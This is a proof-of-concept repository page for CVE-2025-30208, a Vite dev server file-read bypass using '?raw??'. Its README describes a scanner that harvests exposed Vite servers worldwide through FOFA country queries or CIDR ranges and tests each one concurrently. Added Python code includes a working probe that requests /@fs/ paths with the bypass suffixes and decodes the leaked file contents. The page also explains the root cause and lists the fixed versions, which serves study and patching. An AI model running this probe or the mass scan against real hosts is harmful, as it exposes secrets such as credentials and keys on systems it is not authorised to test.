
CVE-2025-30208 PoC — Vite bypasses server.fs.deny when using `?raw??`

Associated Vulnerability
Title: Vite bypasses server.fs.deny when using `?raw??` (CVE-2025-30208)
Description: Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite's serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or the `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
Description
The first Vite scanner on the entire network. Automatic target asset collection via FOFA, multi-threaded concurrent scanning, automatic CSV report generation.
Readme

# Vite Dev Server Vulnerability Scanner

### An automated scanner that works on both internal and external networks
### [Click here for the Chinese README](README-CN.md)

[![Python Version](https://img.shields.io/badge/python-3.6%2B-blue)](https://www.python.org/)
[![License](https://img.shields.io/badge/license-MIT-green)](LICENSE)
[![FOFA](https://img.shields.io/badge/FOFA-API-orange)](https://fofa.info/)

An automated tool for scanning Vite development servers for CVE-2025-30208. It uses the FOFA API to collect potential targets and automatically tests each one for the `server.fs.deny` bypass.

## Features

- Auto
  - Automatic target asset collection via FOFA
  - Multi-threaded concurrent scanning
  - Automatic CSV report generation

- Manual
  - Manual target asset collection via CIDR
  - Multi-threaded concurrent scanning
  - Import targets from TXT
  - Import payload from TXT
  - Automatic CSV report generation

## Screenshots - Auto Mode
![image](/images/colorful_main.png)
## Screenshots - Manual Mode
![image](/images/manual1.png)

## Requirements

- Python 3
- FOFA API account

## Vulnerability Details
- CVE ID: CVE-2025-30208
- Vulnerability Name: Vite dev server `server.fs.deny` bypass (arbitrary file read)
- Description: The Vite development server's `server.fs.deny` file-access restriction can be bypassed by appending `?raw??` or `?import&raw??` to a request URL. No authentication is involved; anyone who can reach the dev server over the network can read any file the server process can read.
- Affected Versions:
  - 6.2.0 to 6.2.2 (fixed in 6.2.3)
  - 6.1.0 to 6.1.1 (fixed in 6.1.2)
  - 6.0.0 to 6.0.11 (fixed in 6.0.12)
  - 5.0.0 to 5.4.14 (fixed in 5.4.15)
  - 4.5.9 and earlier (fixed in 4.5.10)
- In plain terms: `server.fs.deny` is a Vite dev server option holding a list of glob patterns (by default `.env`, `.env.*`, `*.{crt,pem}` and `**/.git/**`) for files the server must never serve, and `/@fs/` requests for paths outside `server.fs.allow` are refused in the same way. Vite strips trailing separators such as `?` from a URL in several places, but the regular expressions that recognise a `?raw` or `?url` query (and so decide whether the access check applies) were not written to tolerate them. A URL ending in `?raw??` therefore does not match the query regex where the check is made, yet is normalised back to `?raw` further down the pipeline, where the raw-import handler reads the file. If the target file exists, its contents are returned to the browser. This leads to the following potential security risks:
  - Reading arbitrary files on the server
  - Accessing system configuration files
  - Obtaining sensitive application information
  - Probing server directory structure
- Precondition: the dev server must be reachable from the attacker's network position. By default Vite listens on localhost only; only projects started with `--host` or with `server.host` configured are exposed.
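To make the check-then-normalise mismatch concrete, here is a constructed Python model of the bug class the advisory describes. It is an added illustration, not Vite's source: `RAW_QUERY_RE`, `TRAILING_SEP_RE`, the `fnmatch`-based deny list (approximating Vite's documented defaults) and the two `serve_*` pipelines are simplified stand-ins, and the real remedy is upgrading to the fixed versions listed above.

```python
import re
from fnmatch import fnmatch
from posixpath import basename

# Constructed model of the bug class, not Vite's code. A strict query regex
# recognises `?raw` only when `raw` is the last parameter or is followed by `&`.
RAW_QUERY_RE = re.compile(r"[?&]raw(?:&|$)")
# Elsewhere in the pipeline, trailing separators are stripped ("?raw??" -> "?raw").
TRAILING_SEP_RE = re.compile(r"[?&]+$")

# Deny list approximating Vite's documented server.fs.deny defaults
# ('.env', '.env.*', '*.{crt,pem}', '**/.git/**'), matched with fnmatch.
DENY_GLOBS = [".env", ".env.*", "*.crt", "*.pem"]


def path_of(url: str) -> str:
    """Path component only: everything before the first '?'."""
    return url.split("?", 1)[0]


def is_denied(path: str) -> bool:
    """Simplified stand-in for the server.fs.deny match."""
    name = basename(path)
    if any(fnmatch(name, g) for g in DENY_GLOBS):
        return True
    return "/.git/" in path or path.endswith("/.git")


def serve_vulnerable(url: str) -> str:
    """Vulnerable ordering: deny check on the un-normalised URL, normalisation afterwards."""
    if RAW_QUERY_RE.search(url) and is_denied(path_of(url)):
        return "denied"
    url = TRAILING_SEP_RE.sub("", url)   # a later stage strips the trailing '?'s
    if RAW_QUERY_RE.search(url):
        return "file contents"           # the raw handler now matches and reads the file
    return "not a raw request"


def serve_fixed(url: str) -> str:
    """Hardened ordering: normalise once, then check and serve the same string."""
    url = TRAILING_SEP_RE.sub("", url)
    if RAW_QUERY_RE.search(url):
        if is_denied(path_of(url)):
            return "denied"
        return "file contents"
    return "not a raw request"


if __name__ == "__main__":
    for u in ("/@fs/app/.env?raw", "/@fs/app/.env?raw??", "/@fs/app/.env?import&raw??"):
        print(f"{u:30} vulnerable={serve_vulnerable(u):16} fixed={serve_fixed(u)}")
```

The point the model makes is independent of the exact regex: whenever an access check and the handler it guards see different normalisations of the same request, the attacker gets to pick an input that fails the check's parser and passes the handler's. The hardened version parses once and reuses that result for both decisions.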

## Configuration

Create a `.env` file in the project root directory with the following content:

```plaintext
FOFA_EMAIL=your_email@example.com
FOFA_KEY=your_fofa_api_key
COUNTRY=AU
```

Common country codes:
- CN: China
- US: United States
- AU: Australia
- DE: Germany
- CA: Canada
- FR: France
- GB: United Kingdom
- IN: India
- JP: Japan
- RU: Russia
- ZA: South Africa
- BR: Brazil
- MX: Mexico
- ES: Spain
- ...etc

## Usage - FOFA

```bash
pip install -r requirements.txt
python main.py
```
## Usage - CIDR

![image](/images/clihelp.png)

```bash
# Install dependencies
pip install -r requirements.txt
# Get help
python manual.py -h

usage: manual.py [-h] [-t TARGETS] [-f FILE] [-p PORTS] [-d DICT]

Vite Dev Server Vulnerability Scanner - Manual Mode

options:
  -h, --help            show this help message and exit
  -t TARGETS, --targets TARGETS
                        Target IP addresses, supports single IP, CIDR format (e.g., 192.168.1.0/24) or
                        domain, separate multiple targets with commas
  -f FILE, --file FILE  Load targets from file (one target per line)
  -p PORTS, --ports PORTS
                        Port list, separate with commas (default: 80,443,3000,5173,8080)
  -d DICT, --dict DICT  Custom dictionary file path (format: one path per line, lines starting with #
                        are ignored)
# Scan 192.168.1.0/24 with default ports
python manual.py -t 192.168.1.0/24
```
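For a single target, a practitioner usually wants a self-contained check before (or instead of) running the full scanner, plus a way to tell from a version string whether the ranges under Vulnerability Details apply. The following Python is an added example and is not part of `main.py` or `manual.py`. The `/@fs/` route and the two suffixes come from the advisory; the assumption marked in the code is that Vite serves a `?raw` import as an ES module whose default export is the file content as a JSON string, so only a response of that shape is counted as a finding.

```python
import json
import re
from urllib.error import HTTPError, URLError
from urllib.parse import quote, urlsplit
from urllib.request import Request, urlopen

# Added example, not part of the scanner. The suffixes are the two forms from
# the advisory; `/@fs/` is Vite's route for absolute filesystem paths.
SUFFIXES = ("?raw??", "?import&raw??")
# Assumption: a `?raw` import is served as `export default "<JSON string>"`.
RAW_MODULE_RE = re.compile(r'^\s*export\s+default\s+(".*")\s*;?\s*$', re.S)

# Affected half-open ranges [lo, hi), derived from the fixed versions in the
# advisory: 6.2.3, 6.1.2, 6.0.12, 5.4.15 and 4.5.10.
AFFECTED_RANGES = [
    ((6, 2, 0), (6, 2, 3)),
    ((6, 1, 0), (6, 1, 2)),
    ((6, 0, 0), (6, 0, 12)),
    ((5, 0, 0), (5, 4, 15)),
    ((0, 0, 0), (4, 5, 10)),
]


def is_affected_version(version: str) -> bool:
    """True if a Vite version string such as '6.2.2' falls in an affected range.
    Pre-release suffixes like '-beta.1' are ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    v = tuple(int(x) for x in m.groups())
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def build_probe_urls(base: str, abs_path: str) -> list[str]:
    """Both bypass forms for one absolute file path, via the /@fs/ route."""
    base = base.rstrip("/")
    path = quote(abs_path.lstrip("/"), safe="/:")   # keeps 'C:/...' usable on Windows hosts
    return [f"{base}/@fs/{path}{s}" for s in SUFFIXES]


def extract_raw_content(body: str):
    """Return the decoded file contents if `body` is a raw-import module, else None."""
    m = RAW_MODULE_RE.match(body)
    if not m:
        return None
    try:
        value = json.loads(m.group(1))
    except json.JSONDecodeError:
        return None
    return value if isinstance(value, str) else None


def classify(status: int, body: str) -> str:
    """Map one HTTP response to a verdict; only a decoded raw module counts as vulnerable."""
    if status == 403:
        return "denied"
    if status == 404:
        return "missing"
    if status != 200:
        return "other"
    return "vulnerable" if extract_raw_content(body) is not None else "unexpected_200"


def probe(base: str, abs_path: str, timeout: float = 10.0) -> list[dict]:
    """Live network check of one target. Returns one record per probe URL, shaped
    like the scanner's CSV rows (url, vulnerable_url, status_code, domain) plus a verdict."""
    records = []
    for url in build_probe_urls(base, abs_path):
        rec = {"url": base, "vulnerable_url": url, "domain": urlsplit(base).hostname}
        try:
            req = Request(url, headers={"User-Agent": "cve-2025-30208-check"})
            with urlopen(req, timeout=timeout) as resp:
                status, body = resp.status, resp.read().decode("utf-8", "replace")
        except HTTPError as e:
            status, body = e.code, ""
        except URLError as e:
            rec.update(status_code=None, verdict=f"error: {e.reason}")
            records.append(rec)
            continue
        rec.update(status_code=status, verdict=classify(status, body))
        records.append(rec)
    return records


# Constructed sample response: the shape a vulnerable server returns for a .env file.
SAMPLE_RAW_MODULE = 'export default "DB_PASSWORD=hunter2\\nDEBUG=true\\n"'

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:   # e.g. python check.py http://10.0.0.5:5173 /etc/hostname
        for rec in probe(sys.argv[1], sys.argv[2]):
            print(rec)
    else:
        print(classify(200, SAMPLE_RAW_MODULE), repr(extract_raw_content(SAMPLE_RAW_MODULE)))
```

Run it only against hosts you are authorised to test. `classify` deliberately reports a 200 that is not a raw module as `unexpected_200` rather than as a finding, because a Vite dev server in SPA mode answers unknown paths with `index.html`, which a status-code-only scanner would misreport as a hit.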

## Configuration Parameters

The following parameters can be adjusted in `main.py`:

- `MAX_PAGE`: Maximum number of query pages (default: 5)
- `RESULTS_PER_PAGE`: Results per page (default: 100)
- `TIMEOUT`: Request timeout in seconds (default: 10)
- `MAX_THREADS`: Maximum concurrent threads (default: 20)

## Output

![image](/images/result.png)

Scan results will be saved in `vite_vulnerable_targets.csv` with the following fields:

- url: Target URL
- vulnerable_url: Probe URL that was found vulnerable
- status_code: HTTP status code
- domain: Domain name
- ip: IP address

## Disclaimer

This tool is intended for security research and authorized testing only. Do not use for illegal purposes. Ensure you have proper authorization before testing any targets.

## License

[MIT License](LICENSE)

## References
- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-30208)
- [GitHub Security Advisory](https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w)
File Snapshot

```text
[4.0K] /data/pocs/987c7a886dc01cc9c945426dcfab302ee952ee87
├── [4.0K] images
│   ├── [101K] clihelp.png
│   ├── [ 97K] colorful_main.png
│   ├── [838K] image.png
│   ├── [309K] manual1.png
│   └── [104K] result.png
├── [1.0K] LICENSE
├── [6.9K] main.py
├── [ 11K] manual.py
├── [4.3K] README-CN.md
├── [4.5K] README.md
├── [ 137] requiremens.txt
├── [1.8K] sensitive_files.json
├── [2.6K] sensitive_urls.txt
└── [ 19] targets.txt

1 directory, 14 files
```

Note that the snapshot lists the dependency file as `requiremens.txt`, while the README's install commands refer to `requirements.txt`; check the filename before running `pip install -r`.